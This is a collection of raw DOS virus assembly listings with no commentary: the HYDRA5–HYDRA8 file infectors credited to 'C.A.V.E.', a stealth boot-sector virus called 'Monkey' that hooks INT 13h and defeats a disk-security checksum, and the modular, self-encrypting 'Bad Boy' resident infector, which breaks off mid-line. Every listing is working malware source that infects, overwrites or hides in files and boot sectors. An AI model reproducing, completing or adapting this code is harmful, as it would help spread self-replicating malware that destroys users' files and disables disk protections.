inc bp pop ax inc bp add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add [bx+si],al add ds:data_1e[bx+si],bh push ax push cs pushf ; Push flags mov cl,13h mov dx,201h push cs pop ds jmp dword ptr data_14 mov ah,4Ch ; 'L' int 21h ; DOS Services ah=function 4Ch ; terminate with al=return code data_14 dd 000C0h db 0CDh, 20h loc_7: xor di,di ; Zero register mov si,265h mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_7,0 mov word ptr cs:data_7+2,es pop bx jmp dword ptr cs:data_7 push ds pop es mov cx,0FFFFh mov si,287h mov di,100h sub cx,si rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov word ptr cs:[100h],100h mov word ptr cs:[102h],ds mov ax,bx jmp dword ptr cs:[100h] int 20h ; DOS program terminate hydra5 endp seg_a ends end start done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA6 ██ ;██ ██ ;██ Created: 27-Aug-91 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ psp_cmd_size equ 80h data_14e equ 174h data_15e equ 177h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra6 proc far start: jmp loc_1 pop cx inc sp add [bx+si],al data_3 db 'HyDra-6 Beta - Not For Release' db '. *.CO?' db 0 data_6 dw 0, 8B39h data_8 dw 0 data_9 db 0 db 29 dup (0) data_10 db 0 db 13 dup (0) copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. ' data_11 db 'COMMAND.*', 0 loc_1: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,174h mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_9 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_3+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_2: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_10 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_14e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,174h mov cs:data_8,ax cmp word ptr ds:data_15e,4459h jne loc_3 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_6 ; Jump if carry Set jmp short loc_2 loc_3: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_4 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_8 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_4: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_5: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_8 nop loc_6: mov ah,1Ah mov dx,offset data_9 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx push dx mov dx,offset data_11 ; ('COMMAND.*') mov ah,4Eh ; 'N' xor cx,cx ; Zero register int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_7: mov ah,3Ch ; '<' xor cx,cx ; Zero register mov dx,offset data_10 int 21h ; DOS Services ah=function 3Ch ; create/truncate file @ ds:dx mov bx,ax jc loc_5 ; Jump if carry Set mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle jc loc_5 ; Jump if carry Set mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jnc loc_7 ; Jump if carry=0 loc_8: xor di,di ; Zero register mov si,252h mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_6,0 mov word ptr cs:data_6+2,es pop bx jmp dword ptr cs:data_6 push ds pop es mov cx,0FFFFh mov si,274h mov di,100h sub cx,si rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov word ptr cs:[100h],100h mov word ptr cs:[102h],ds mov ax,bx jmp dword ptr cs:[100h] int 20h ; DOS program terminate hydra6 endp seg_a ends end start done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA7 ██ ;██ ██ ;██ Created: 27-Aug-91 ██ ;██ Passes: 5 Analysis Options on: AW ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ psp_cmd_size equ 80h data_16e equ 170h data_17e equ 173h seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra7 proc far start: jmp loc_1 pop cx inc sp add [bx+si],al data_4 db 'HyDra-7 Beta - Not For Release' db '. *.CO?' db 0 data_7 dw 0, 8B39h data_9 dw 0 data_10 db 0 db 29 dup (0) data_11 db 0 db 13 dup (0) copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. ' data_12 db 2Ah db 2Eh, 45h, 58h, 45h, 00h loc_1: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,170h mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_10 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_4+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_2: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_11 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_16e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,170h mov cs:data_9,ax cmp word ptr ds:data_17e,4459h jne loc_3 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_6 ; Jump if carry Set jmp short loc_2 loc_3: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_4 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_9 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_4: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_5: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_8 nop loc_6: mov ah,1Ah mov dx,offset data_10 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx push dx mov dx,offset data_12 mov ah,4Eh ; 'N' xor cx,cx ; Zero register int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_5 ; Jump if carry Set loc_7: mov ah,3Ch ; '<' xor cx,cx ; Zero register mov dx,offset data_11 int 21h ; DOS Services ah=function 3Ch ; create/truncate file @ ds:dx mov bx,ax jc loc_5 ; Jump if carry Set mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle jc loc_5 ; Jump if carry Set mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jnc loc_7 ; Jump if carry=0 loc_8: xor di,di ; Zero register mov si,24Eh mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_7,0 mov word ptr cs:data_7+2,es pop bx jmp dword ptr cs:data_7 push ds pop es mov cx,0FFFFh mov si,270h mov di,100h sub cx,si rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov word ptr cs:[100h],100h mov word ptr cs:[102h],ds mov ax,bx jmp dword ptr cs:[100h] int 20h ; DOS program terminate hydra7 endp seg_a ends end start done ;██████████████████████████████████████████████████████████████████████████ ;██ ██ ;██ HYDRA8 ██ ;██ ██ ;██ Created: 28-Aug-91 ██ ;██ Passes: 5 Analysis Options on: W ██ ;██ Copyright (c) ██ ;██ ██ ;██████████████████████████████████████████████████████████████████████████ psp_cmd_size equ 80h data_17e equ 1EFh data_18e equ 1F2h data_19e equ 9D9Ah seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h hydra8 proc far start: jmp loc_3 db 59h, 44h, 00h, 00h data_3 db 'HyDra-8 Beta - Not For Release' db '. *.CO?' db 0 data_6 dw 0, 8B39h data_8 dw 0 data_9 db 0 db 18 dup (0) data_10 db 0 db 10 dup (0) data_11 db 0 db 0, 0, 0, 0, 0, 0 data_12 db 0 db 0, 0, 0, 0, 0, 0 copyright db 'Copyright (c)' db ' 1991 by C.A.V.E. ' data_13 db 2Ah db 2Eh, 45h, 58h, 45h, 00h data_14 db 33h db 0C9h, 1Eh, 52h,0E8h, 06h, 00h db 0E8h, 13h, 00h,0EBh, 36h, 90h db 0BEh, 48h, 01h db 0BFh, 5Ah, 01h,0B9h, 12h, 00h locloop_1: xor byte ptr [si],0F5h movsb ; Mov [si] to es:[di] loop locloop_1 ; Loop if cx > 0 retn db 0B8h, 00h, 0Fh,0CDh, 10h,0B4h db 00h,0CDh, 10h,0B8h, 00h, 02h db 0B6h, 0Ch,0B2h, 1Fh,0CDh, 10h db 33h,0D2h db 0BAh, 5Ah, 01h,0B4h, 09h,0CDh db 21h,0B8h, 00h, 02h,0B6h, 18h db 0B2h, 00h,0CDh, 10h,0C3h db 0B8h, 00h, 4Ch,0CDh, 21h, 00h db 0A2h, 9Dh, 9Ah,0F5h, 9Ch, 86h db 0F5h db 0BFh, 9Ah, 9Dh, 9Bh,0F5h,0B2h db 94h, 99h, 81h,0CAh,0D1h loc_3: push ax mov ax,cs add ax,1000h xor di,di ; Zero register mov cx,1EFh mov si,100h mov es,ax rep movsb ; Rep when cx >0 Mov [si] to es:[di] mov ah,1Ah mov dx,offset data_9 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov ah,4Eh ; 'N' mov dx,offset data_3+22h ; ('*') int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_7 ; Jump if carry Set loc_4: mov ah,3Dh ; '=' mov al,2 mov dx,offset data_11 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax push es pop ds mov ax,3F00h mov cx,0FFFFh mov dx,data_17e int 21h ; DOS Services ah=function 3Fh ; read file, bx=file handle ; cx=bytes to ds:dx buffer add ax,1EFh mov cs:data_8,ax cmp word ptr ds:data_18e,4459h jne loc_5 ; Jump if not equal mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jc loc_8 ; Jump if carry Set jmp short loc_4 loc_5: xor cx,cx ; Zero register mov dx,cx mov ax,4200h int 21h ; DOS Services ah=function 42h ; move file ptr, bx=file handle ; al=method, cx,dx=offset jc loc_6 ; Jump if carry Set mov ah,40h ; '@' xor dx,dx ; Zero register mov cx,cs:data_8 int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer loc_6: mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle push cs pop ds loc_7: mov ah,1Ah mov dx,psp_cmd_size int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx jmp short loc_11 db 90h loc_8: clc ; Clear carry flag xor cx,cx ; Zero register push ds push dx mov ah,1Ah mov dx,offset data_9 int 21h ; DOS Services ah=function 1Ah ; set DTA(disk xfer area) ds:dx mov dx,offset data_13 mov ah,4Eh ; 'N' xor cx,cx ; Zero register int 21h ; DOS Services ah=function 4Eh ; find 1st filenam match @ds:dx jc loc_7 ; Jump if carry Set loc_9: mov ah,3Ch ; '<' xor cx,cx ; Zero register mov dx,offset data_11 int 21h ; DOS Services ah=function 3Ch ; create/truncate file @ ds:dx mov bx,ax jc loc_7 ; Jump if carry Set mov ax,3D02h mov dx,offset data_11 int 21h ; DOS Services ah=function 3Dh ; open file, al=mode,name@ds:dx mov bx,ax clc ; Clear carry flag xor dx,dx ; Zero register mov ah,40h ; '@' mov dx,offset data_14 mov cx,5Ah int 21h ; DOS Services ah=function 40h ; write file bx=file handle ; cx=bytes from ds:dx buffer cmp ax,5Ah jb loc_10 ; Jump if below mov ah,3Eh ; '>' int 21h ; DOS Services ah=function 3Eh ; close file, bx=file handle jc loc_10 ; Jump if carry Set mov ah,4Fh ; 'O' int 21h ; DOS Services ah=function 4Fh ; find next filename match jnc loc_9 ; Jump if carry=0 loc_10: mov ax,4C00h int 21h ; DOS Services ah=function 4Ch ; terminate with al=return code loc_11: xor di,di ; Zero register mov si,offset data_15 mov cx,22h rep movsb ; Rep when cx >0 Mov [si] to es:[di] pop bx mov cs:data_6,0 mov word ptr cs:data_6+2,es pop bx jmp dword ptr cs:data_6 data_15 db 1Eh db 07h,0B9h,0FFh,0FFh,0BEh,0EFh db 02h,0BFh, 00h, 01h, 2Bh,0CEh db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh db 2Eh, 00h, 01h,0CDh db 20h hydra8 endp seg_a ends end start done Code Segment Assume CS:Code,DS:CODE,ES:CODE ORG 00H MAIN: JMP INITIAL ; space above 1fh is for floppy format data ORG 1FH INT_13 EQU THIS BYTE PUSH DS PUSH SI PUSH DI PUSH AX PUSH CX PUSH DX CALL SET_HEAD CMP AH,02H JNZ END_ACTION PUSH DX SUB AX,AX INT 1AH TIME EQU $ + 2 CMP DL,40H POP DX JNB END_ACTION CALL HANDLE_DISK END_ACTION: POP DX POP CX POP AX POP DI PUSH DX PUSH CX PUSH AX CMP CX,03H ; YES, IS SECTOR LESS THAN 3? JNB EXIT_2 ; NO, EXIT CMP DH,BYTE PTR DS:[SI] ; Right head? JNZ EXIT_2 ; NO, EXIT CMP AH,02H ; READ ? JZ STEALTH ; YES, STEALTH CMP AH,03H ; WRITE ? JNZ EXIT_2 ; NO, EXIT ; YES! CMP DL,80H ; HARD DRIVE? JB EXIT_2 ; NO, EXIT SUB AH,AH ; else RESET DISK - make HD light blink JMP SHORT EXIT_2 ; EXIT STEALTH: CALL INT13 ; READ JB EXIT_3 ; ERROR? CALL COMP_SIG ; MY RELATIVE? JZ REDIRECT ; YES, REDIRECT CALL COMP_PA ; NO, IS IT PA? JZ REDIRECT ; YES, REDIRECT EXIT_0: CLC ; NO, RESET FLAG JMP SHORT EXIT_3 ; EXIT REDIRECT: CALL CHSEC ; CALC. THE SECTOR TO HIDE & PUT IN CL MOV DH,BYTE PTR DS:[SI+1] ; SET RIGHT HEAD POP AX ; RESTORE AX CALL INT13 ; RE-READ CALL ENCRPT_PBR POP CX ; RESTORE CX, DX POP DX JMP SHORT EXIT_4 ; EXIT EXIT_2: CALL INT13 EXIT_3: POP DS POP DS POP DS EXIT_4: POP SI POP DS RETF 0002H READ_SEC_1: MOV AX,0201H ; READ INT13 PROC NEAR PUSHF CALL DWORD PTR CS:INT13_ADDR ;*********** RET INT13 ENDP HOOK_ENTRY EQU THIS BYTE HOOK: INT 12H MOV SI,004CH PUSH SI CMP BYTE PTR CS:HOME_SEC,02H ; I am in sector 2? JZ SETUP_SPECIAL SETUP_NORMAL: CALL SHIFT_NORMAL MOV DI,OFFSET INT13_ADDR MOV CX,0002H CLD REPZ MOVSW JMP SHORT STORE_SEGMENT SETUP_SPECIAL: CALL SHIFT_SPECIAL STORE_SEGMENT: POP SI MOV WORD PTR DS:[SI],OFFSET INT_13 ; STORE MY ENTRY POINT MOV DS:[SI+2],AX ; STORE MY SEGMENT PATCH_OVER: PUSH CS POP DS CALL PATCH ; PATCH OVER PUSH ES ; PUSH SEGMENT MOV AX,OFFSET JMP_ADDR PUSH AX ; PUSH ADDRESS STI RETF ; FAR JMP JMP_ADDR EQU THIS BYTE BOOT: MOV ES,CX MOV BX,SP ; TO 0000:7C00 PUSH CX ; SAVE JMP SEGMENT PUSH BX MOV DX,0080H ; HANDLE C: CALL SET_HEAD CALL HANDLE_DISK BOOT_SEC EQU $ + 1 MOV CL,05H ; FROM SECTOR 3 ???? BOOT_DISK EQU $ + 1 MOV DX,0100H ; C:, HEAD 0 ???? CALL READ_SEC_1 ; INT 13 CALL ENCRPT_PBR RETF HANDLE_DISK PROC NEAR ; *** READ SECTOR 1 *** SUB CX,CX INC CX PUSH CX MOV DH,[SI] ; HEAD CALL READ_SEC_1 ; INT 13 JB END_HANDLE_DISK ; ERROR -> END ; *** COMPARE *** CALL COMP_SIG JZ E_2 ; SAME -> UPDATE MYSELF ; *** PA? *** CALL COMP_PA ; Is it Pagett's disksec? JNZ UPDATE_DISK ; NO ; *** OK? *** INC CX CMP WORD PTR ES:[BX+1FAH],00H ; when this byte in disksec is set ; to 0 means disksec would not do ; checksum of partitions - Pagett ; sucks JZ E_2 ; SAME -> UPDATE MYSELF MOV WORD PTR ES:[BX+1FAH],00H ; set this to zero MOV CL,1H ; write the change back to sector 1 CALL WRITE_SEC_1 ; JB END_HANDLE_DISK ; *** YES! READ SECTOR 2 *** INC CX ; yes,Pagette 's disksecure is on sector 1 MOV DH,[SI+2] ; My relative is on sector 2 - read sector 2 CALL READ_SEC_1 ; INT 13 JB END_HANDLE_DISK ; ERROR -> END POP AX PUSH CX UPDATE_DISK: CALL CHSEC ; CALC. THE SECTOR TO HIDE & PUT IN CL CALL ENCRPT_PBR INC SI CALL WRITE_SEC_1 DEC SI JB END_HANDLE_DISK CALL ENCRPT_PBR PUSH CX CALL PATCH POP CX PUSH DX CMP DL,80H JNB E_1 XOR DL,DL E_1: MOV WORD PTR ES:[BX+BOOT_DISK],DX POP DX MOV BYTE PTR ES:[BX+BOOT_SEC],CL POP CX PUSH CX MOV BYTE PTR ES:[BX+OFFSET HOME_SEC],CL MOV WORD PTR ES:[BX+OFFSET BOOT_SIG],0AA55H E_2: CALL WRITE_SEC_1 END_HANDLE_DISK: POP AX RET HANDLE_DISK ENDP WRITE_SEC_1 PROC NEAR MOV DH,[SI] WRITE_SEC_2: MOV AX,0301H CALL INT13 RET WRITE_SEC_1 ENDP COMP_SIG PROC NEAR CMP ES:[BX+OFFSET PROG_SIG],9219H RET COMP_SIG ENDP COMP_PA PROC NEAR CMP WORD PTR ES:[BX+119H],6150H ; PA? RET COMP_PA ENDP HOME_SEC DB 01H FLOPPY_HEAD DB 00H,01H,01H HARD_HEAD DB 00H,00H,00H ; 360 720 1.2 1.44 FLOP_SECT_TABLE DB 02H,05H,09H,0BH SAVE_SECT_TABLE DB 03H,05H,0EH,0EH CHSEC PROC NEAR PUSH DI PUSH SI MOV AL,ES:[BX+14H] MOV CX,0004H CHSEC_1: MOV SI,CX DEC SI CMP FLOP_SECT_TABLE[SI],AL JZ CHSEC_END_1 LOOP CHSEC_1 MOV CL,03H JMP SHORT CHSEC_END_2 CHSEC_END_1: MOV CL,SAVE_SECT_TABLE[SI] CHSEC_END_2: POP SI POP DI RET CHSEC ENDP SHIFT_NORMAL PROC NEAR ; FIND THE SEGMENT TO HIDE DEC AX MOV DS:[413H],AX SHIFT_SPECIAL: MOV CL,06H SHL AX,CL ADD AL,20H MOV ES,AX RET SHIFT_NORMAL ENDP PATCH PROC NEAR ; PATCH ON BOOT SECTOR STARTING AT BYTE int_13 PUSH SI MOV DI,BX MOV SI,OFFSET INT_13 ADD DI,SI ; CLD MOV CX,OFFSET PROG_END - OFFSET INT_13 REPZ MOVSB PATCH_JMP: MOV DI,BX SUB SI,SI MOV CL,3H REPZ MOVSB POP SI RET PATCH ENDP SET_HEAD PROC NEAR PUSH CS POP DS MOV SI,OFFSET FLOPPY_HEAD CMP DL,80H JB SET_HEAD_EXIT MOV SI,OFFSET HARD_HEAD SET_HEAD_EXIT: RET SET_HEAD ENDP INITIAL: CLI SUB BX,BX MOV DS,BX MOV SS,BX MOV SP,7C00H JMP HOOK NOP NOP ENCRPT_PBR: PUSH DI PUSH CX PUSH AX MOV DI,BX MOV CX,200H CLD ENCRPT_1: MOV AL,ES:[DI] ENCRPT_CODE EQU $ + 0001H XOR AL,2EH STOSB LOOP ENCRPT_1 POP AX POP CX POP DI RET ORG 01F4H ;PROG_NAME DB "Monkey" PROG_NAME DB 6dh,8fh,8eh,8bh,85h,99h ORG 01FAH PROG_SIG DB 19H,92H PROG_END EQU THIS BYTE ORG 01FCH INT13_ADDR DB 00H,00H ORG 01FEH BOOT_SIG DB 55H,0AAH PROG_TAIL EQU THIS BYTE PROG_LEN EQU OFFSET PROG_END - OFFSET INT_13 CODE ENDS END MAIN done code segment assume cs:code,ds:code .radix 16 org 100 start: push word ptr cs:[table+2] push cs pop ds jmp word ptr cs:[table] ;go to module 1 curofs dw ? files db 0 ;number of infected files from this copy fsize dw 2 ;size of infected file ftime dw ? fdate dw ? stdint21 dd ? oldint13 dd ? oldint21 dd ? oldint24 dd ? ;------------- TABLE WITH MODULE PARAMETERS -------------------- table: dw offset false_mod_1 ;00 dw offset mod_2 ;02 dw offset mod_3 ;04 dw offset mod_4 ;06 ;offset modules dw offset mod_5 ;08 dw offset mod_6 ;0a dw offset mod_7 ;0c dw offset mod_8 ;0e dw offset mod_2 - offset mod_1;10 dw offset mod_3 - offset mod_2;12 dw offset mod_4 - offset mod_3;14 dw offset mod_5 - offset mod_4;16 dw offset mod_6 - offset mod_5;18 ;size modules dw offset mod_7 - offset mod_6;1a dw offset mod_8 - offset mod_7;1c dw offset myend - offset mod_8;1e ;------------- MODULE - 1 - CODER/DECODER ---------------------- mod_1: mov bx,offset table+2 ;first module to working (module 2) mov cx,6 ;number of modules to working mod_1_lp1: cmp bx,offset table+0a jne mod_1_cont add bx,2 mod_1_cont: push bx push cx mov ax,[bx] ;ax - offset module mov cx,[bx+10] ;cx - size of module mov bx,ax mod_1_lp2: xor byte ptr [bx],al inc bx loop mod_1_lp2 pop cx pop bx add bx,2 loop mod_1_lp1 ret ;------------- MODULE - 2 - MUTATION TO MEMORY ----------------- mod_2: ;instalation check mov es,cs:[2] ;memory size mov di,100 mov si,100 mov cx,0bh repe cmpsb jne mod_2_install ;jump if not install jmp word ptr cs:[table+06] ;if install, jump to module 4 mod_2_install: ;instalation mov ax,cs dec ax mov ds,ax cmp byte ptr ds:[0],'Z' je mod_2_cont jmp word ptr cs:[table+6] ;if no last MCB - go to mod4 mod_2_cont: sub word ptr ds:[3],0c0 mov ax,es sub ax,0c0 mov es,ax mov word ptr ds:[12],ax ;decrement memory size with 2K push cs pop ds mod_2_mut: mov byte ptr cs:files,0 mov di,100 mov cx,offset mod_1-100 mov si,100 rep movsb ;write table to new memory mov bx,word ptr cs:[table] add bx,offset mod_1_lp2-offset mod_1+1 xor byte ptr [bx],18 ;change code method mov cx,8 mov word ptr curofs,offset mod_1 mod_2_lp1: push cx call mod_2_rnd ;generate random module addres push bx ;addres in table returned from mod_2_rnd mov ax,[bx] ;offset module push ax add bx,10 mov cx,[bx] ;length of module pop si pop bx xchg di,curofs mov word ptr es:[bx],di ;change module offset in table rep movsb ;copy module to new memory xchg di,curofs ;change current offset in new memory mov ax,8000 or word ptr [bx],ax ;mark module - used pop cx loop mod_2_lp1 mov cl,8 not ax mov bx,offset table mod_2_lp2: and word ptr [bx],ax ;unmark all modules add bx,2 loop mod_2_lp2 jmp word ptr cs:[table+4] ;go to module 3 mod_2_rnd: push cx push es xor cx,cx mov es,cx mod_2_lp3: mov bx,es:[46c] db 81,0e3,07,00 ;and bx,7 shl bx,1 add bx,offset table test [bx],8000 jnz mod_2_lp3 pop es pop cx ret ;------------- MODULE - 3 - SET INTERRUPT VECTORS --------------- mod_3: xor ax,ax mov ds,ax mov ax,ds:[4*21] mov word ptr es:[oldint21],ax mov ax,ds:[4*21+2] mov word ptr es:[oldint21+2],ax mov ah,30 int 21 cmp ax,1e03 jne mod_3_getvec mov word ptr es:[stdint21],1460 mov ax,1203 push ds int 2f mov word ptr es:[stdint21+2],ds pop ds jmp mod_3_setvec mod_3_getvec: mov ax,ds:[4*21] mov word ptr es:[stdint21],ax mov ax,ds:[4*21+2] mov word ptr es:[stdint21+2],ax mod_3_setvec: cli mov ax,word ptr es:[table+0c] mov ds:[4*21],ax mov ax,es mov ds:[4*21+2],ax sti mov cx,es mov ah,13 ; int 2f ; push es ; mov es,cx ; mov word ptr es:[oldint13],dx ; get standart int13 addres mov word ptr es:[oldint13+2],ds ; pop es ; int 2f ; jmp word ptr cs:[table+06] ;go to module 4 ;------------- MODULE - 4 - RESTORE OLD PROGRAM CODE & START ---- mod_4: push cs push cs pop ds pop es mov si,word ptr cs:[table+06] add si,offset mod_4_cont - offset mod_4 mov di,cs:fsize add di,offset myend+1 push di mov cx,offset mod_5 - offset mod_4_cont cld rep movsb ret mod_4_cont: mov si,cs:fsize add si,100 cmp si,offset myend+1 jnc mod_4_cnt mov si,offset myend+1 mod_4_cnt: mov di,100 mov cx,offset myend-100 rep movsb mov ax,100 ; push ax ; jmp 100 ret ; ;------------- MODULE - 5 - SPECIAL PROGRAM --------------------- mod_5: mov ah,9 mov dx,word ptr [table+8] add dx,offset msg-offset mod_5 push cs pop ds int 21 cli hlt msg db 0dh,0a,'The bad boy halt your system ...',7,7,'$' ;------------- MODULE - 6 - INT 24 HEADER ----------------------- mod_6: mov al,3 iret db 'The Bad Boy virus, Copyright (C) 1991.',0 ;------------- MODULE - 7 - INT 21 HEADER ----------------------- mod_7: push bx push si push di push es push ax cmp ax,4b00 je mod_7_begin jmp mod_7_exit mod_7_begin: push ds push cs ; pop es ; xor ax,ax ; mov ds,ax ; mov si,4*24 ; mov di,offset oldint24 ; movsw ; change int24 vector movsw ; mov ax,word ptr cs:[table+0a] ; cli ; mov ds:[4*24],ax ; mov ax,cs ; mov ds:[4*24+2],ax ; sti pop ds mov ax,3d00 ; pushf ; call cs:oldint21 ; jc mod_7_ex ; open,infect,close file mov bx,ax ; mod_7_infect: ; call word ptr cs:[table+0e] ; pushf mov ah,3e ; pushf ; call cs:oldint21 ; popf jc mod_7_ex push ds ; cli ; xor ax,ax ; mov ds,ax ; mov ax,word ptr cs:[oldint13] ; xchg ax,word ptr ds:[4*13] ; mov word ptr cs:[oldint13],ax ; exchange int13 vectors mov ax,word ptr cs:[oldint13+2] ; xchg ax,word ptr ds:[4*13+2] ; mov word ptr cs:[oldint13+2],ax ; sti ; pop ds ; mod_7_ex: push ds ; xor ax,ax ; mov ds,ax ; mov ax,word ptr cs:oldint24 ; mov ds:[4*24],ax ; mov ax,word ptr cs:oldint24+2 ; restore int24 vector mov ds:[4*24+2],ax ; pop ds ; mod_7_exit: pop ax pop es pop di pop si pop bx jmp cs:oldint21 ;------------- MODULE - 8 - INFECTING (bx - file handle) -------- mod_8: push cx push dx push ds push es push di push bp push bx mov ax,1220 int 2f mov bl,es:[di] xor bh,bh mov ax,1216 int 2f pop bx mov ax,word ptr es:[di+11] cmp ax,0f000 jc mod_8_c jmp mod_8_exit mod_8_c: mov word ptr es:[di+2],2 ;open mode - R/W mov ax,es:[di+11] mov cs:fsize,ax ; save file size mov ax,word ptr es:[di+0dh] ; mov word ptr cs:[ftime],ax ; save file date/time mov ax,word ptr es:[di+0f] ; mov word ptr cs:[fdate],ax ; push cs ; pop ds ; mov dx,offset myend+1 ; mov cx,offset myend-100 ; read first bytes mov ah,3f ; pushf call cs:oldint21 jnc mod_8_cnt jmp mod_8_exit mod_8_cnt: mov bp,ax ; ax - bytes read mov si,dx mov ax,'MZ' cmp ax,word ptr ds:[si] jne mod_8_nxtchk jmp mod_8_exit mod_8_nxtchk: xchg ah,al cmp ax,ds:[si] jne mod_8_cnt2 jmp mod_8_exit mod_8_cnt2: push es push di push cs ; pop es ; mov si,100 ; mov di,dx ; check for infected file mov cx,0bh ; repe cmpsb ; pop di pop es jne mod_8_cnt1 ; jmp mod_8_exit mod_8_cnt1: mov word ptr es:[di+15],0 ; fp:=0 push es push di mov si,word ptr cs:[table+0e] add si,offset mod_8_cont - offset mod_8 xor di,di push cs pop es mov cx,offset mod_8_cont_end - offset mod_8_cont cld rep movsb pop di pop es mov si,word ptr cs:[table+0e] add si,offset mod_8_cont_end - offset mod_8 push si xor si,si push si push ds ; cli ; xor ax,ax ; mov ds,ax ; mov ax,word ptr cs:[oldint13] ; xchg ax,word ptr ds:[4*13] ; mov word ptr cs:[oldint13],ax ; mov ax,word ptr cs:[oldint13+2] ; exchange int13 vectors xchg ax,word ptr ds:[4*13+2] ; mov word ptr cs:[oldint13+2],ax ; sti ; pop ds ; ret mod_8_cont: push bx call word ptr cs:[table] ; code virus pop bx mov dx,100 ; mov ah,40 ; write code in begin mov cx,offset myend-0ff pushf ; call cs:stdint21 ; pushf push bx call word ptr cs:[table] ; decode virus pop bx popf jnc mod_8_cont1 pop ax mov ax,word ptr cs:[table+0e] add ax,offset mod_8_ext - offset mod_8 push ax ret mod_8_cont1: mov ax,es:[di+11] ; fp:=end of file mov word ptr es:[di+15],ax ; mov dx,offset myend+1 mov cx,bp ; bp - 